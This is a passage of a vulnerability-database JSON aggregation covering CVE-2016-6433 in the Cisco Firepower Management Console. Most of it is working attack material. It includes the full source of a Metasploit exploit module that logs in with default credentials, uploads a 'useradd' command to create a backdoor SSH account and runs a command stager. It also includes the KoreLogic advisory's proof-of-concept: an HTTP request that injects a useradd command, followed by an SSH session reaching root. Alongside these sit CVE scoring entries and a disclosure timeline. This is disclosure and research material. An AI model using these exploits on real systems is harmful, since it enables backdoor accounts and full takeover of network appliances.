\nprivate_type: :password \n}.merge(service_data) \n \nlogin_data = { \nlast_attempted_at: DateTime.now, \ncore: create_credential(credential_data), \nstatus: Metasploit::Model::Login::Status::SUCCESSFUL, \nproof: opts[:proof] \n}.merge(service_data) \n \ncreate_credential_login(login_data) \nend \n \ndef do_login \nconsole_user = datastore['USERNAME'] \nconsole_pass = datastore['PASSWORD'] \nuri = normalize_uri(target_uri.path, 'login.cgi') \n \nprint_status(\"Attempting to login in as #{console_user}:#{console_pass}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'vars_post' => { \n'username' => console_user, \n'password' => console_pass, \n'target' => '' \n} \n}) \n \nunless res \nfail_with(Failure::Unknown, 'Connection timed out while trying to log in.') \nend \n \nres_cookie = res.get_cookies \nif res.code == 302 && res_cookie.include?('CGISESSID') \ncgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first \nprint_status(\"CGI Session ID: #{cgi_sid}\") \nprint_good(\"Authenticated as #{console_user}:#{console_pass}\") \nreport_cred(username: console_user, password: console_pass) \nreturn cgi_sid \nend \n \nnil \nend \n \ndef execute_command(cmd, opts = {}) \n@first_exec = true \ncmd.gsub!(/\\/tmp/, '/usr/tmp') \n \n# Weird hack for the cmd stager. \n# Because it keeps using > to write the payload. \nif @first_exec \n@first_exec = false \nelse \ncmd.gsub!(/>>/, ' > ') \nend \n \nbegin \nTimeout.timeout(3) do \n@ssh_socket.exec!(\"#{cmd}\\n\") \nvprint_status(\"Executing #{cmd}\") \nend \nrescue Timeout::Error \nfail_with(Failure::Unknown, 'SSH command timed out') \nrescue Net::SSH::ChannelOpenFailed \nprint_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)') \nretry \nend \nend \n \ndef init_ssh_session(user, pass) \nprint_status(\"Attempting to log into SSH as #{user}:#{pass}\") \n \nfactory = ssh_socket_factory \nopts = { \nauth_methods: ['password', 'keyboard-interactive'], \nport: datastore['SSHPORT'], \nuse_agent: false, \nconfig: false, \npassword: pass, \nproxy: factory, \nnon_interactive: true \n} \n \nopts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] \n \nbegin \nssh = nil \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \n@ssh_socket = Net::SSH.start(rhost, user, opts) \nend \nrescue Net::SSH::Exception => e \nfail_with(Failure::Unknown, e.message) \nend \nend \n \ndef exploit \n# To exploit the useradd vuln, we need to login first. \nsid = do_login \nreturn unless sid \n \n# After login, we can call the useradd utility to create a backdoor user \nnew_user = generate_new_username \nnew_pass = generate_new_password \ncreate_ssh_backdoor(sid, new_user, new_pass) \n \n# Log into the SSH backdoor account \ninit_ssh_session(new_user, new_pass) \n \nbegin \nexecute_cmdstager({:linemax => 500}) \nensure \n@ssh_socket.close \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140467/cisco_firepower_useradd.rb.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:16", "description": "", "cvss3": {}, "published": "2016-10-05T00:00:00", "type": "packetstorm", "title": "Cisco Firepower Threat Management Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "PACKETSTORM:138988", "href": "https://packetstormsecurity.com/files/138988/Cisco-Firepower-Threat-Management-Command-Execution.html", "sourceData": "`KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command \nExecution Leading to Root Access \n \nTitle: Cisco Firepower Threat Management Console Remote Command Execution \nLeading to Root Access \nAdvisory ID: KL-001-2016-007 \nPublication Date: 2016.10.05 \nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Cisco \nAffected Product: Firepower Threat Management Console \nAffected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) \nPlatform: Embedded Linux \nCWE Classification: CWE-434: Unrestricted Upload of File with Dangerous \nType, CWE-94: Improper Control of Generation of Code \nImpact: Arbitrary Code Execution \nAttack vector: HTTP \nCVE-ID: CVE-2016-6433 \n \n2. Vulnerability Description \n \nAn authenticated user can run arbitrary system commands as \nthe www user which leads to root. \n \n3. Technical Description \n \nA valid session and CSRF token is required. The webserver runs as \na non-root user which is permitted to sudo commands as root with \nno password. \n \nPOST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1 \nHost: 1.3.3.7 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) \nGecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate, br \nDNT: 1 \nCookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6 \nConnection: close \nContent-Type: multipart/form-data; \nboundary=---------------------------15519792567789791301241925798 \nContent-Length: 813 \n \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"manual_update\" \n \n1 \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"source\" \n \nfile \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"file\"; \nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\" \nContent-Type: application/octet-stream \n \nsudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"action_submit\" \n \nImport \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"sf_action_id\" \n \n8c6059ae8dbedc089877b16b7be2ae7f \n-----------------------------15519792567789791301241925798-- \n \n \nHTTP/1.1 200 OK \nDate: Sat, 23 Apr 2016 13:38:01 GMT \nServer: Apache \nVary: Accept-Encoding \nX-Frame-Options: SAMEORIGIN \nContent-Length: 49998 \nConnection: close \nContent-Type: text/html; charset=utf-8 \n \n... \n \n$ ssh korelogic@1.3.3.7 \nPassword: \n \nCopyright 2004-2016, Cisco and/or its affiliates. All rights reserved. \nCisco is a registered trademark of Cisco Systems, Inc. \nAll other trademarks are property of their respective owners. \n \nCisco Fire Linux OS v6.0.1 (build 37) \nCisco Firepower Management Center for VMWare v6.0.1 (build 1213) \n \nCould not chdir to home directory /Volume/home/korelogic: No such file or \ndirectory \nkorelogic@firepower:/$ sudo su - \nPassword: \nroot@firepower:~# \n \n4. Mitigation and Remediation Recommendation \n \nThe vendor has acknowledged this vulnerability but has \nnot issued a fix. Vendor acknowledgement available at: \n \nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2 \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin (@thatguylevel) of \nKoreLogic, Inc. \n \n6. Disclosure Timeline \n \n2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. \n2016.06.30 - Cisco acknowledges receipt of vulnerability report. \n2016.07.20 - KoreLogic and Cisco discuss remediation timeline for \nthis vulnerability and for 3 others reported in the \nsame product. \n2016.08.12 - 30 business days have elapsed since the vulnerability was \nreported to Cisco. \n2016.09.02 - 45 business days have elapsed since the vulnerability was \nreported to Cisco. \n2016.09.09 - KoreLogic asks for an update on the status of the \nremediation efforts. \n2016.09.15 - Cisco confirms remediation is underway and soon to be \ncompleted. \n2016.09.28 - Cisco informs KoreLogic that the acknowledgement details \nwill be released publicly on 2016.10.05. \n2016.10.05 - Public disclosure. \n \n7. Proof of Concept \n \nSee Technical Description \n \n \nThe contents of this advisory are copyright(c) 2016 \nKoreLogic, Inc. and are licensed under a Creative Commons \nAttribution Share-Alike 4.0 (United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. is a founder-owned and operated company with a \nproven track record of providing security services to entities \nranging from Fortune 500 to small and mid-sized companies. We \nare a highly skilled team of senior security consultants doing \nby-hand security assessments for the most important networks in \nthe U.S. and around the world. We are also developers of various \ntools and resources aimed at helping the security community. \nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/138988/KL-001-2016-007.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-10T11:32:00", "description": "This Metasploit module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability.", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "zdt", "title": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-01-12T00:00:00", "id": "1337DAY-ID-26656", "href": "https://0day.today/exploit/description/26656", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Cisco Firepower Management Console.\r\n The management system contains a configuration flaw that allows the www user to\r\n execute the useradd binary, which can be abused to create backdoor accounts.\r\n Authentication is required to exploit this vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt', # Original discovery & PoC\r\n 'sinn3r' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-6433' ],\r\n [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 10 2016',\r\n 'CmdStagerFlavor'=> %w{ echo },\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => 'true',\r\n 'SSLVersion' => 'Auto',\r\n 'RPORT' => 443\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n # admin:Admin123 is the default credential for 6.0.1\r\n OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),\r\n OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),\r\n OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),\r\n OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),\r\n OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # For this exploit to work, we need to check two services:\r\n # * HTTP - To create the backdoor account for SSH\r\n # * SSH - To execute our payload\r\n\r\n vprint_status('Checking Cisco Firepower Management console...')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')\r\n })\r\n\r\n if res && res.code == 200\r\n vprint_status(\"Console is found.\")\r\n vprint_status(\"Checking SSH service.\")\r\n begin\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n Net::SSH.start(rhost, 'admin',\r\n port: datastore['SSHPORT'],\r\n password: Rex::Text.rand_text_alpha(5),\r\n auth_methods: ['password'],\r\n non_interactive: true\r\n )\r\n end\r\n rescue Timeout::Error\r\n vprint_error('The SSH connection timed out.')\r\n return Exploit::CheckCode::Unknown\r\n rescue Net::SSH::AuthenticationFailed\r\n # Hey, it talked. So that means SSH is running.\r\n return Exploit::CheckCode::Appears\r\n rescue Net::SSH::Exception => e\r\n vprint_error(e.message)\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_sf_action_id(sid)\r\n requirements = {}\r\n\r\n print_status('Attempting to obtain sf_action_id from rulesimport.cgi')\r\n\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\"\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')\r\n end\r\n\r\n sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]\r\n\r\n unless sf_action_id\r\n fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')\r\n end\r\n\r\n sf_action_id\r\n end\r\n\r\n def create_ssh_backdoor(sid, user, pass)\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n sf_action_id = get_sf_action_id(sid)\r\n sh_name = 'exploit.sh'\r\n\r\n print_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\")\r\n\r\n mime_data = Rex::MIME::Message.new\r\n mime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"')\r\n mime_data.add_part('file', nil, nil, 'form-data; name=\"source\"')\r\n mime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"')\r\n mime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"')\r\n mime_data.add_part(\r\n \"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\",\r\n 'application/octet-stream',\r\n nil,\r\n \"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\"\r\n )\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\",\r\n 'data' => mime_data.to_s,\r\n 'vars_get' => { 'no_mojo' => '1' },\r\n })\r\n end\r\n\r\n def generate_new_username\r\n datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def generate_new_password\r\n datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def report_cred(opts)\r\n service_data = {\r\n address: rhost,\r\n port: rport,\r\n service_name: 'cisco',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: fullname,\r\n username: opts[:user],\r\n private_data: opts[:password],\r\n private_type: :password\r\n }.merge(service_data)\r\n\r\n login_data = {\r\n last_attempted_at: DateTime.now,\r\n core: create_credential(credential_data),\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\r\n proof: opts[:proof]\r\n }.merge(service_data)\r\n\r\n create_credential_login(login_data)\r\n end\r\n\r\n def do_login\r\n console_user = datastore['USERNAME']\r\n console_pass = datastore['PASSWORD']\r\n uri = normalize_uri(target_uri.path, 'login.cgi')\r\n\r\n print_status(\"Attempting to login in as #{console_user}:#{console_pass}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'username' => console_user,\r\n 'password' => console_pass,\r\n 'target' => ''\r\n }\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')\r\n end\r\n\r\n res_cookie = res.get_cookies\r\n if res.code == 302 && res_cookie.include?('CGISESSID')\r\n cgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first\r\n print_status(\"CGI Session ID: #{cgi_sid}\")\r\n print_good(\"Authenticated as #{console_user}:#{console_pass}\")\r\n report_cred(username: console_user, password: console_pass)\r\n return cgi_sid\r\n end\r\n\r\n nil\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n @first_exec = true\r\n cmd.gsub!(/\\/tmp/, '/usr/tmp')\r\n\r\n # Weird hack for the cmd stager.\r\n # Because it keeps using > to write the payload.\r\n if @first_exec\r\n @first_exec = false\r\n else\r\n cmd.gsub!(/>>/, ' > ')\r\n end\r\n\r\n begin\r\n Timeout.timeout(3) do\r\n @ssh_socket.exec!(\"#{cmd}\\n\")\r\n vprint_status(\"Executing #{cmd}\")\r\n end\r\n rescue Timeout::Error\r\n fail_with(Failure::Unknown, 'SSH command timed out')\r\n rescue Net::SSH::ChannelOpenFailed\r\n print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')\r\n retry\r\n end\r\n end\r\n\r\n def init_ssh_session(user, pass)\r\n print_status(\"Attempting to log into SSH as #{user}:#{pass}\")\r\n\r\n factory = ssh_socket_factory\r\n opts = {\r\n auth_methods: ['password', 'keyboard-interactive'],\r\n port: datastore['SSHPORT'],\r\n use_agent: false,\r\n config: false,\r\n password: pass,\r\n proxy: factory,\r\n non_interactive: true\r\n }\r\n\r\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n ssh = nil\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n @ssh_socket = Net::SSH.start(rhost, user, opts)\r\n end\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, e.message)\r\n end\r\n end\r\n\r\n def exploit\r\n # To exploit the useradd vuln, we need to login first.\r\n sid = do_login\r\n return unless sid\r\n\r\n # After login, we can call the useradd utility to create a backdoor user\r\n new_user = generate_new_username\r\n new_pass = generate_new_password\r\n create_ssh_backdoor(sid, new_user, new_pass)\r\n\r\n # Log into the SSH backdoor account\r\n init_ssh_session(new_user, new_pass)\r\n\r\n begin\r\n execute_cmdstager({:linemax => 500})\r\n ensure\r\n @ssh_socket.close\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/26656", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T14:55:07", "description": "The Threat Management Console in Cisco Firepower Management Center 5.2.0 through 6.0.1 allows remote authenticated users to execute arbitrary commands via crafted web-application parameters, aka Bug ID CSCva30872.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-06T10:59:00", "type": "cve", "title": "CVE-2016-6433", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2021-01-05T17:39:00", "cpe": ["cpe:/a:cisco:firepower_management_center:5.4.1.5", "cpe:/a:cisco:firepower_management_center:5.2.0", "cpe:/a:cisco:firepower_management_center:5.4.1.3", "cpe:/a:cisco:firepower_management_center:5.3.0.3", "cpe:/a:cisco:firepower_management_center:5.4.1.6", "cpe:/a:cisco:firepower_management_center:5.4.1.4", "cpe:/a:cisco:firepower_management_center:5.4.1", "cpe:/a:cisco:firepower_management_center:5.4.0.2", "cpe:/a:cisco:firepower_management_center:5.3.1.4", "cpe:/a:cisco:firepower_management_center:5.3.0.2", "cpe:/a:cisco:firepower_management_center:5.4.1.2", "cpe:/a:cisco:firepower_management_center:5.3.1.5", "cpe:/a:cisco:firepower_management_center:5.3.0", "cpe:/a:cisco:firepower_management_center:5.3.1", "cpe:/a:cisco:firepower_management_center:6.0.1", "cpe:/a:cisco:firepower_management_center:5.3.1.3", "cpe:/a:cisco:firepower_management_center:5.4.0", "cpe:/a:cisco:firepower_management_center:5.4.1.1", "cpe:/a:cisco:firepower_management_center:5.3.0.4", "cpe:/a:cisco:firepower_management_center:5.3.1.6"], "id": "CVE-2016-6433", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6433", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:cisco:firepower_management_center:5.4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.3:*:*:*:*:*:*:*"]}], "korelogic": [{"lastseen": "2021-12-15T01:42:57", "description": "1. Vulnerability Details\n\n Affected Vendor: Cisco\n Affected Product: Firepower Threat Management Console\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\n Platform: Embedded Linux\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\n Type, CWE-94: Improper Control of Generation of Code\n Impact: Arbitrary Code Execution\n Attack vector: HTTP\n CVE-ID: CVE-2016-6433\n\n2. Vulnerability Description\n\n An authenticated user can run arbitrary system commands as\n the www user which leads to root.\n\n3. Technical Description\n\n A valid session and CSRF token is required. The webserver runs as\n a non-root user which is permitted to sudo commands as root with\n no password.\n\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\n Host: 1.3.3.7\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate, br\n DNT: 1\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\n Connection: close\n Content-Type: multipart/form-data; boundary=---------------------------15519792567789791301241925798\n Content-Length: 813\n\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"manual_update\"\n\n 1\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"source\"\n\n file\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"file\"; filename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\n Content-Type: application/octet-stream\n\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"action_submit\"\n\n Import\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"sf_action_id\"\n\n 8c6059ae8dbedc089877b16b7be2ae7f\n -----------------------------15519792567789791301241925798--\n\n\n HTTP/1.1 200 OK\n Date: Sat, 23 Apr 2016 13:38:01 GMT\n Server: Apache\n Vary: Accept-Encoding\n X-Frame-Options: SAMEORIGIN\n Content-Length: 49998\n Connection: close\n Content-Type: text/html; charset=utf-8\n\n ...\n\n $ ssh korelogic@1.3.3.7\n Password:\n\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\n Cisco is a registered trademark of Cisco Systems, Inc.\n All other trademarks are property of their respective owners.\n\n Cisco Fire Linux OS v6.0.1 (build 37)\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\n\n Could not chdir to home directory /Volume/home/korelogic: No such file or directory\n korelogic@firepower:/$ sudo su -\n Password:\n root@firepower:~#\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has acknowledged this vulnerability but has\n not issued a fix. Vendor acknowledgement available at:\n https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.\n\n6. Disclosure Timeline\n\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\n this vulnerability and for 3 others reported in the\n same product.\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.09 - KoreLogic asks for an update on the status of the\n remediation efforts.\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\n completed.\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\n will be released publicly on 2016.10.05.\n 2016.10.05 - Public disclosure.\n\n7. Proof of Concept\n\n See Technical Description", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "korelogic", "title": "Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "KL-001-2016-007", "href": "https://korelogic.com/Resources/Advisories/KL-001-2016-007.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T08:19:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "exploitdb", "title": "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-6433", "CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "EDB-ID:40463", "href": "https://www.exploit-db.com/exploits/40463", "sourceData": "KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command\r\nExecution Leading to Root Access\r\n\r\nTitle: Cisco Firepower Threat Management Console Remote Command Execution\r\nLeading to Root Access\r\nAdvisory ID: KL-001-2016-007\r\nPublication Date: 2016.10.05\r\nPublication URL: 